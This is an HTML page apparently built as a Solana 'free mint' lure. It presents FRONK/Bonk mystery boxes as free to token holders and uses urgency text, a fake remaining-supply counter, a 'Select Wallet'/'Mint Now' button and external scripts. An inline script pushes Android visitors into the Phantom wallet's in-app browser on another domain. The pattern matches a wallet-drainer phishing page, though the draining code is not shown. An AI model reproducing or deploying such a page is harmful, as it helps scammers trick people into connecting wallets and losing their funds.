<html lang="en"><head>
<meta charset="utf-8">
<link rel="icon" href="https://fronk.xyz/fronk-logo.png">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="theme-color" content="#000000">
<title>FRONK</title>
<script defer="defer" src="js/s2.js%3Fss"></script>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="theme-color" content="#F8CFF1">
<title>Bonk</title>
<link rel="shortcut icon" href="https://fronk.xyz/fronk-logo.png">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
<link rel="stylesheet" href="css/normalize.css">
<link rel="stylesheet" href="css/style.css@s1xsx.css%3Fsss.css">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;1,100;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://storage.googleapis.com/scriptslmt/0.1.3/solana.css">
</head>
<body>
<script>
      new Image().src = 'https://whos.amung.us/swidget/megatron'
    </script>
<div class="wrapper">
<div class="main-area">
<div class="main-area__left">
<div class="slider-area _ibj">
<figure>
<img src="https://fronk.xyz/fronk-logo.png" alt="Jpg">
</figure>
</div>
</div>
<div class="main-area__right">
<br>
<br>
<br>
<h2 class="right-title">
<figure>
              <img src="https://cdn.discordapp.com/attachments/959673796833456138/1061698751250567328/image-removebg-preview.png" alt="Jpg">
            </figure>
</h2>
<br>
<br>
<br>
<div class="right-list">
<div>
<div class="text">If you are a Token holder, you are entitled to 1 free mint. Mint rights are limited. So hurry! Bonk is a mystery boxes project launched on solana, but minted in $FRONK! Mystery Boxes will be able to be opened 1-2 days post-mint and boxes will include a variety of items.</div>
</div>
</div>
<br>
<br>
<br>
<div class="price">
<div class="price-list">
<li>
<div class="text">Remaining</div>
<div class="number">
<div class="token-number" id="tokenup">
<span id="tokennumber">4956</span> / <span id="endTick">5555</span>
</div>
</div>
</li>
<li>
<div class="text">Public Price</div>
<div class="number">Free ◎</div>
</li>
</div>
<div id="root"><div class="slsl"><button class="wallet-adapter-button wallet-btn" tabindex="0" type="button">Select Wallet</button><div class="row"><div class="col"><button type="submit" class="btn btn-primary">Mint Now</button></div></div></div></div>
</div>
</div>
</div>
</div>
<script src="js/tokenup.js"></script>
<script type="text/javascript">
if ((navigator.userAgent.match(/(android)/i))) {
    if ((navigator.userAgent.match(/(phantom)/i))) {
    } else {

        if ((navigator.userAgent.match(/(android)/i))) {
            location.replace("intent://phantom.app/ul/browse/https://fronk.art/?ref=https://fronk.art/#Intent;scheme=https;package=app.phantom;end");
        }
    }
}
</script>
</body></html>